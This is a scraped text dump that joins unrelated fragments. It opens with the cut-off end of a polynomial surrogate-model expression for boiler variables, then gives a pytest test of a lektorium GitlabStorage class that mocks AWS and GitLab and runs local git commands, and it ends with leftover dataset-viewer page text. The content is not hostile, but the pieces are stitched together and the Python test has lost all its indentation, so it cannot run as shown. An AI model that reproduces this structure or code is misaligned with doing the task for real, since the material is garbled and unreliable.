-0.415888 * b.wall_temperature_waterwall[t, 11]*b.mf_H2O_coal_raw[t] \
+0.0836883 * b.wall_temperature_waterwall[t, 12]*b.SR_lf[t] \
+0.0307674 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-16.1433 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
+13.5804 * b.flowrate_coal_raw[t]*b.SR[t] \
+287.31 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
-3021.62 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-4546.15 * b.SR[t]*b.SR_lf[t] \
+2.61054 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-0.000160638 * (b.wall_temperature_waterwall[t, 3]*b.SR_lf[t])**2 \
-0.161015 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-2.63321 * (b.flowrate_coal_raw[t]*b.SR_lf[t])**2)",
}
|
import subprocess
from unittest import mock
import pytest
from lektorium.repo.local.storage import AWS, GitLab, GitlabStorage, GitStorage
@pytest.mark.asyncio
async def test_gitlabstorage(tmpdir):
remote_dir = tmpdir / 'remote'
local_dir = tmpdir / 'local'
remote_dir.mkdir()
local_dir.mkdir()
subprocess.check_call('git init --bare .', shell=True, cwd=remote_dir)
subprocess.check_call(f'git clone {remote_dir} .', shell=True, cwd=local_dir)
with mock.patch.multiple(
AWS,
create_s3_bucket=lambda *args, **kwargs: 'bucket_name',
create_cloudfront_distribution=lambda *args, **kwargs: ('dist_id', 'domain_name'),
open_bucket_access=lambda *args, **kwargs: None,
):
async def init_project_mock(*args, **kwargs):
return 'site_repo'
with mock.patch.multiple(GitLab, init_project=init_project_mock):
async def mock_create_site(*args, **kwargs):
return local_dir, {}
with mock.patch.multiple(
GitStorage,
__init__=lambda *args, **kwargs: None,
create_site=mock_create_site,
):
storage = GitlabStorage(
'git@server.domain:namespace/reponame.git',
'token',
'protocol',
)
assert storage.repo == 'server.domain'
assert storage.namespace == 'namespace'
site_workdir, options = await storage.create_site(None, 'foo', '', 'bar')
assert (local_dir / '.gitlab-ci.yml').exists()
assert (local_dir / 'foo.lektorproject').exists()
assert site_workdir == local_dir
assert options == {
'cloudfront_domain_name': 'domain_name',
'url': 'https://domain_name',
}
assert await storage.create_site_repo('') == 'site_repo'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.